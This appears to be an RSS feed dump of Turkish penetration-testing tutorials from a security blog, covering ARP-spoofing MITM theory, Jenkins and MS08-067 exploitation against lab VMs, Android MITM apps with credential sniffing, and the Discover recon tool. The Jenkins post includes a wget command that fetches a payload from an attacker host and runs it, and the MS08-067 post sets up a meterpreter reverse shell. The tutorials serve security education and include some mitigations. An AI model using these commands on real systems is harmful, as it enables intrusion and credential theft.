Switchler ise OSI modelinin 2. katmanında çalışır ve hub gibi dağıtım görevinden sorumludur. Hubtan farklı olarak, switch veriyi portlarına bağlı tüm sistemlere dağıtmak yerine sadece hedef sisteme dağıtır. Bu sebep ile veri hem daha dinamik ve verimli şekilde hedefe ulaşır hemde paketler ilgili olmayan kişi-
ler tarafından okunamaz. Mı acaba ?

İşte bu noktada MITM adını verdiğimiz, Türkçesi Ortadaki Adam Saldırısı olanve oldukça favorim olan bir yol izleyebiliriz.

mitm_theory_1

 

Örnek senaryomuzdada gördüğünüz gibi iki kullanıcı birbirleriyle haberleşmek istemektedir ve bunu switch aracılığıyla rahatlıkla yapmaktadır. Switch kendisine bağlı olan tüm bilgisayar yada hostların MAC adreslerini bir ARP tablosu adını verdiğimiz bir tabloda tutar. Kaynak sistem, hedef sistemle iletişim kurmak için Arp tablosunu kontrol eder ve ilgili kullanıcıyı bulur. Korsan ArpSpoofing saldırısı ile çok sayıda request göndererek ARP önbelleğini zehirler ve Arp spoofing saldırısı sonucu zehirlenen Arp önbelleği farklı çalışmaya başlar ve kaynak bilgisayardan gelen veriyi korsanın bilgisayarına, korsanda iletilmesi gereken kaynağa gönderir. Böylelikle bütün paketler korsan bilgisayardan yakalanabilir hale gelir ve paketler incelenerek istenilen verilere
ulaşılabilir.

Mitm_theory_2

Bu yöntem ile switch kullanılan ağlarda sniffing yapılmış olur. Bu saldırılar nasıl yapılır, hangi araçlar ile yapılabilir gibi soruların cevabını bulmak için diğer makalelerimize göz atmanızı tavsiye ederim.

Buraya kadar MITM’in mantığını anladıysak gelelim buna ne gibi önlemler alınabilir ?

Spoofing gibi saldırılar aynı ağ üzerinde olan sistemlere yönelik olduğundan ve arp paketi gönderebilmek için yönetici yetkisine sahip olmak gerektiği için ağa yetkisiz kişilerin bağlanması ve boot edilmesi güvenliği geçersiz
kılacaktır. Bu sebepten dolayı öncelikle fiziksel önlemler alınmalıdır.

Eğer büyük bir ağ yapınız yok ise Arp önbelleğinizi static hale getirirseniz her hangi bir ARP Request ve ARP Reply paketleriyle güncellenmesinin önüne geçileceğinden dolayı güvenli bir hala gelmiş olur. Bir başka yöntem ise ağınızı
düzenli olarak kontrol etmenizdir.

TR | MITM Teorisi Mert Gücü

]]>
https://canyoupwn.me/tr-mitm-teorisi/feed/ 0
TR | How To Exploit Jenkins https://canyoupwn.me/tr-how-to-exploit-jenkins/ https://canyoupwn.me/tr-how-to-exploit-jenkins/#respond Fri, 15 Apr 2016 06:30:28 +0000 https://canyoupwn.me/?p=1676 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Jenkins geliştirme süreçlerini otomatikleştirmeye yarayan ve genelde 8080 portunda çalışan bir uygulamadır. Jenkinste script bölümü vardır ve buraya yazılan scriptleri otomatik olarak çalıştırır. Bu anlatımımda Canyoupwn.me ekibi olarak hazırlamış olduğumuz içinde zafiyetleri barındıran ve bunlardan biriside Jenkins zafiyeti olan Kevgir’den yararlandım. IP adresi 192.168.79.143 olarak bildiğim Kevgir’i nmap aracıyla açık servis ve portlarını tarıyorum. nmap […]

TR | How To Exploit Jenkins Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Jenkins geliştirme süreçlerini otomatikleştirmeye yarayan ve genelde 8080 portunda çalışan bir uygulamadır. Jenkinste script bölümü vardır ve buraya yazılan scriptleri otomatik olarak çalıştırır.

Bu anlatımımda Canyoupwn.me ekibi olarak hazırlamış olduğumuz içinde zafiyetleri barındıran ve bunlardan biriside Jenkins zafiyeti olan Kevgir’den yararlandım.

IP adresi 192.168.79.143 olarak bildiğim Kevgir’i nmap aracıyla açık servis ve portlarını tarıyorum.

nmap –sT 192.168.79.143 –p 8080,9000 –A  komut ile 8080 ve 9000 numaralı portları taradım.

Çıkan sonucu incelediğimizde 8080 Portunda Apachi Tomcatin çalıştığını, 9000 portunda ise Jenkinsin çalıştığını gördük. Port taramalarında servis taramalarının önemini burada bir kez daha görmüş olduk. Her ne kadar Jenkins genelde 8080 portundada çalışsa da burada başka bir port üzerinde çalıştığını görmüş olduk.

jenkins_1

İkinci aşamada web portalı üzerinden Jenkinsin script paneline erişim sağlamalıyız. Bunun için ilgili ip adresi ve portu yazmalıyız.

192.168.79.143:9000/script adresine gittiğimizde bizi bir login paneli karşılamakta.

Jenkins_2

Metasploit aracı ile panele şifre denemesi yapacağız. Bunun için metasploit üzerinde jenkinsle ilgili hangi araçları kullanacağımızı bilmemiz gerekiyor. Eğer yeterli bilgiye sahip değilsek search jenkins

komutu ile metasploit içerisinde bulunan jenkinse ait uygulamaları görebiliriz. Biz jenkins_login’i kullanacağız.

jenkins_3

Gerekli bilgileri veridğimizde kullanıcı adı ve parolayı bulduk.

Simdi web portalından script alanına giriş yapabiliriz.

Payload hazırlamak ve çalıştırmak için yine metasploit içinde bulunan web_delivery’den yararlanacağız.

jenkins_4

http://192.168.79.140:8080/6hP4nFP0Fw9’  içine bir python ile oluşturulmuş payload oluşturdu ve biz bu payload’u jenkinsin script modülünden çalıştırmamız gereklidir.

jenkins_5

Öncelikli olarak “wget http://192.168.79.140:8080/6hP4nFP0Fw9 -O /root/Desktop/jenkins_payload”.execute() komutu ile payloadu indiriyoruz ve kaydediyoruz. Ardından;

python /root/Desktop/jenkins_payload.execute()

komutu ile indirdiğimiz payloadu çalıştırıyoruz.

jenkins_6

Web_delivery üzerinden takip ettiğimizde sessionu aldığımızı göreceksiniz.

TR | How To Exploit Jenkins Mert Gücü

]]>
https://canyoupwn.me/tr-how-to-exploit-jenkins/feed/ 0
TR | Netapi (MS08-067) https://canyoupwn.me/tr-ms08_067_netapi/ https://canyoupwn.me/tr-ms08_067_netapi/#respond Sat, 02 Apr 2016 06:58:52 +0000 https://canyoupwn.me/?p=1317 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Netapi uzaktan kod çalıştırılabilen kritik seviye bir güvenlik açığıdır. Bu açıkla ilgili detaylı bilgiye buradan erişebilir ve detaylarını inceleyebilirsiniz. IP adresi 192.168.79.142 olan Windows XP işletim sistemine sahip ve netapi zafiyeti olduğunu bildiğim sanal bilgisayarı nmap aracı ile tarıyoruz. nmap –sT –A 192.168.79.142 komutuyla hedef adresi tarayalım, bakalım neler çıkacak. Nmap ile ilgili daha detaylı bilgiye ulaşmak için Nmap Cheat Sheet  […]

TR | Netapi (MS08-067) Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Netapi uzaktan kod çalıştırılabilen kritik seviye bir güvenlik açığıdır. Bu açıkla ilgili detaylı bilgiye buradan erişebilir ve detaylarını inceleyebilirsiniz.

IP adresi 192.168.79.142 olan Windows XP işletim sistemine sahip ve netapi zafiyeti olduğunu bildiğim sanal bilgisayarı nmap aracı ile tarıyoruz.

nmap –sT –A 192.168.79.142

komutuyla hedef adresi tarayalım, bakalım neler çıkacak. Nmap ile ilgili daha detaylı bilgiye ulaşmak için Nmap Cheat Sheet  adresini ziyaret edebilirsiniz.

 

2

Yukarıda da görüldüğü üzere 445 port  açık ve arkasında açığa sebep olan microsoft-ds çalışmaktadır. Tekrar nmap aracı ile zafiyetin olup olmadığını tespit edebiliriz. Bunun için

nmap -sS -p 445 --script smb-check-vulns.nse 192.168.79.142 --script-args=unsafe=1

komutunu kullanmalıyız.

8

Tarama sonucu bize zafiyet olduğu yönünde bir geri dönüş yaptı. Yeni bir konsol açıyoruz ve msfconsole komutu ile Metasploiti çalıştırıyoruz.

Komutumuzun tam olarak ne olduğunu bilmiyor yada hatırlamıyor olabiliriz. Dolayısıyla search komutu ile exploitimizi arayacağız.

4

Gördüğünüz gibi sonuçlarımız geldi.

use exploit/windows/smb/ms08_067_netapi

komutu ile exploiti seçiyoruz.

show options ile bizden neler istendiğini görebiliriz.

5

Gördüğünüz üzere bizden RHOST (Hedef İp Adresi) istiyor. RPORT (Hedef Port) otomatik ayarlanmış ve 445 numaralı port olarak geldiği için bir değişiklik yapmamıza gerek yoktur. Tabi burda hatırlatmak istediğim bir konu var. Başta hatırlarsanız ki servisleride taradık. Bunun nedeni 445 numaralı portta çalışacak diye bir kural olmamasıdır. Dolayısıyla portları ve servisleri tarayıp 445 portunun arkasında çalışan sistemi teyit ettik.

Exploit işlemi başarıyla gerçekleşirse bize bağlantı sağlayacak bir payloada ihtiyaç duyuyoruz.

set PAYLOAD windows/meterpreter/reverse_tcp

komutu ile tercih ettiğimiz payloadu belirtiyoruz. Buradaki reverse_tcp, hedef bilgisayarın bizim ile bağlantı kuracağını belirtir. Dolayısıyla bir LHOST (Local İp Adresimiz) ‘i vermemiz gerekiyor. Eğer vermezsek exploit işlemi başarıyla gerçekleşmeyecektir ve bunun uyarısı bize verilecektir.

Diğer seçenekler arasında olan bind_tcp yi neden kullanmadım ? Bunu açıklamadan önce reverse ve bind arasındaki farkı açıklamam gerekiyor. Reverse bağlantılarda hedef bilgisayar, sizin bilgisayarınıza bağlantı isteği gönderir. Bind bağlantılarda ise durum tam tersidir. Bind bağlantı istekleriyse siz bağlantı istediği gönderdiğnizde bu dış katmanda bulunan Firewall gibi koruyucu sistemlere takılabilir ve işleminiz gerçekleşmeyebilir. Tabiki söylemekte fayda var ki her iki sisteminde artıları ve eksileri mevcuttur. Biz burada reverse_tcp’yi kullanacağız.

6

Başarıyla hedefimizdeki sisteme girdik.

Peki gelelim şimdi en can alıcı konuya. Bu saldırıdan nasıl korunabiliriz?

Öncelikle tavsiye buradan adresinden ilgili sistemin yamasını kurmanızdır.

Diğer bir yöntem ise ihtiyaç duymuyorsak ilgili portu kapatabilir ve ya bir başka porta yönlendirebiliriz. Fakat servis taraması yapan birisi yinede o portu bulacaktır. İlgili servisi kapatmak için Control Panel > Administrative Tools > Services > Server (Denetim Masası > Yönetimsel Araçlar > Hizmetler) penceresinden Sunucu Hizmetlerini seçerek devre dışı bırakabilir.

7

Son bir çözüm olarakta güvenlik duvarından ilgili portlara dışarıdan istek yapılmasını engelleyebilirsiniz. Ama bu yukarıdada anlattığım gibi reverse_tcp yapılması durumunda bir işe yaramayacaktır çünkü bağlantıyı XP sistemli bilgisayar kuracaktır.

TR | Netapi (MS08-067) Mert Gücü

]]>
https://canyoupwn.me/tr-ms08_067_netapi/feed/ 0
TR | Akıllı Telefonlarla Sızma Testleri https://canyoupwn.me/tr-akilli-telefonlarla-sizma-testleri/ https://canyoupwn.me/tr-akilli-telefonlarla-sizma-testleri/#respond Wed, 23 Mar 2016 07:30:45 +0000 https://canyoupwn.me/?p=836 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Günümüzde oldukça yaygın kullanılan bir saldırı türü olan MITM (Man In The Middle –Ortadaki Adam) saldırısı, bilgisayar yardımıyla rahatlıkla yapılmaktadır. Fakat sızma testlerinde her zaman istenilen fiziksel koşullar sağlanamayabilir. Bu sorunu ortadan kaldırmak için akıllı telefonlar kullanılabilir. Bu yazımda Android işletim sisteminde oldukça sık kullanılan iki aracı tanıtacağım. Intercepter-NG Kesinlikle favorim olan ve kullanımı kolay olan […]

TR | Akıllı Telefonlarla Sızma Testleri Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Günümüzde oldukça yaygın kullanılan bir saldırı türü olan MITM (Man In The Middle –Ortadaki Adam) saldırısı, bilgisayar yardımıyla rahatlıkla yapılmaktadır. Fakat sızma testlerinde her zaman istenilen fiziksel koşullar sağlanamayabilir. Bu sorunu ortadan kaldırmak için akıllı telefonlar kullanılabilir. Bu yazımda Android işletim sisteminde oldukça sık kullanılan iki aracı tanıtacağım.

Intercepter-NG

Kesinlikle favorim olan ve kullanımı kolay olan bu aracı Google Play ‘den indirebilirsiniz. Fakat kullanmak istiyorsanız telefonunuzun Root’ lu olması gerekmektedir.

1

2

Ekran alıntısında görüldüğü gibi alt bölümde bağlı bulunduğumuz SSID ve aldığımız ip adresi görülmektedir. Sol üst köşede bulunan radar butonuna basarak ağa bağlı olan diğer istemcileri tespit edebiliriz.

3

Ağımızdaki istemcilerin ip adreslerini görmüş olduk. 192.168.0.1(Varsayılan ağ geçidi) ve MITM saldırısını yapacağımız diğer istemciyi seçiyoruz ve sağ üst köşede bulunan  “→” işaretine tıkladığımızda sniff edilen paketlerin loglarının takibini yapabileceğimiz ekrana yönlendiriliyoruz.

4

Burada SSLStrip (HTTPS kullanılan bağlantılar için.), Save(Kaydet) .pcap session ve Autoscroll(Otomatik kaydır.) seçeneklerini seçtik.

5

Saldırımızı başlattığımızda yukarıda gördüğümüz gibi paketleri yakalayıp içlerindeki giriş bilgilerini ayıklayabiliyoruz. İstersek yan sekmedeki Wireshark benzeri özelliği kullanıp paketleri inceleme imkanımız da mevcut.

6

zANTİ

Zanti Google Play ’den indirebileceğimiz ve Root  yetkisi gerektirmeyen, MITM saldırısının yanı sıra bir çok farklı özelliği de içinde bulunduran oldukça kullanışlı bir uygulamadır.

7

Uygulamayı açtıktan sonra Refresh butonuna basıyoruz ve ağımızda bulunan cihazların listesini görüyoruz. Test etmek istediğimiz istemciye tıklıyoruz. Uygulama bize Nmap taramaları dışında 4 farklı saldırı vektörü sunuyor.

8

Password complexity audit  seçeneği altında parola kırma saldırıları gerçekleştirebilmek için bize seçenekler sunmaktadır.

9

Man in the Middle sekmesini açtığımızda Intercepter-NG’nin aksine bize bir çok farklı seçenek sunmaktadır.

Redirect HTTP

Bu özellik ile kurbanın HTTP isteklerini istediğimiz url ‘ e yönlendirebiliriz.

10

Replace Images

Bu özellikle kullanıcının karşısına gelen resimleri, kendi belirlediğimiz resimlerle değiştirebiliriz.

Capture Download

Bu özellikle kullanıcı bir indirme gerçekleştirdiğinde, kendi dosyamızı indirtebiliriz.

Insert HTML

Kullanıcının tarayıcısına html kodlarını enjekte edebiliriz.

11

zanti

 

 

TR | Akıllı Telefonlarla Sızma Testleri Mert Gücü

]]>
https://canyoupwn.me/tr-akilli-telefonlarla-sizma-testleri/feed/ 0
TR | Discover Nedir, Nasıl Kullanılır ? https://canyoupwn.me/tr-discover-nedir-nasil-kullanilir/ https://canyoupwn.me/tr-discover-nedir-nasil-kullanilir/#respond Sun, 28 Feb 2016 12:46:53 +0000 https://canyoupwn.me/?p=781 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Discover bilgi güvenliği testleri ve sızma testlerinin en önemli aşaması olarak varsayılan, bilgi toplama aşaması için kullanılan ve içinde The Harvester, Dnsrecon, Nikto gibi birçok önemli uygulamayı bir araya toplayan oldukça kullanışlı bir uygulamadır. Peki ben bunu nerden bulurum, nasıl kurarım? Açık kaynak kodlu şekilde githubta yayınlanmış olan discoverı, /opt klasörünün altında /discover klasörü oluşturacak şekilde […]

TR | Discover Nedir, Nasıl Kullanılır ? Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Discover bilgi güvenliği testleri ve sızma testlerinin en önemli aşaması olarak varsayılan, bilgi toplama aşaması için kullanılan ve içinde The Harvester, Dnsrecon, Nikto gibi birçok önemli uygulamayı bir araya toplayan oldukça kullanışlı bir uygulamadır.

Peki ben bunu nerden bulurum, nasıl kurarım?

discover1

Açık kaynak kodlu şekilde githubta yayınlanmış olan discoverı, /opt klasörünün altında /discover klasörü oluşturacak şekilde yazdırıyoruz.

2

/opt klasörünün içinde klasör yapısına baktığımızda discover uygulamamızın indiğini göreceğiz. Baktığımızda çalıştırmaya hazır bir şekilde bizi bekliyor.

./discover.sh komutuyla çalıştırıyoruz ve artık hedefimiz hakkında bilgi toplamaya başlayabiliriz.

İlk adım olarak pasif taramayla hedefimiz hakkında bilgi toplamaya başlayalım. 1. Menüyü seçiyoruz.3

Tekrar 1. Seçeneği seçip pasif taramayı başlatmamız gerekecektir.

4

Testlerimizi yapacağımız kurumun adını ve domain adresini yazıyoruz. Sadece bilgi içerikli bir yazı olduğundan Google’n pasif bilgilerini toplayacağım. Bu bilgiler internetten araştırarakta bulabileceğiniz bilgiler olduğundan dolayı yasaldır.

5

Taramamız bittiğinde datalarımızın kaydolduğu klasör yapısını bizimle paylaşmaktadır.

6

Verilerimizin bulunduğu /root/data/www.google.com dizinin içinde verilerimize ulaşabileceğimiz index.htm bulunmaktadır.

7

Tarayıcımızı açıp url kısmına uzantımızı yazdığımızda karşımıza bir arayüz gelmektedir. Reports sekmesi altından Passive Recon’u seçerek elde ettiğimiz bilgilerin toplu listesine ulaşabiliriz.8

9

10

Gördüğünüz gibi Domain, subdomain, who is, mail, döküman listesi gibi bir çok bilgiye dakikalar sonra ulaşabildik.

Pasif bilgi toplama dışında 13. Menüden Metasploit’in içinde bulunan multi/handler aracınıda otomatik olarak başlatabiliyoruz.

11

Aynı zamanda 7. Menüyü kullanarakta Nmap üzerinden port taramaları yapmak mümkündür.

12

Gördüğünüz gibi tek bir uygulama üzerinden bir çok bilgi toplama işlemini dakikalar içerisinde yaptık. İçerisinde bulunan diğer modülleride kullanmamız mümkündür.

TR | Discover Nedir, Nasıl Kullanılır ? Mert Gücü

]]>
https://canyoupwn.me/tr-discover-nedir-nasil-kullanilir/feed/ 0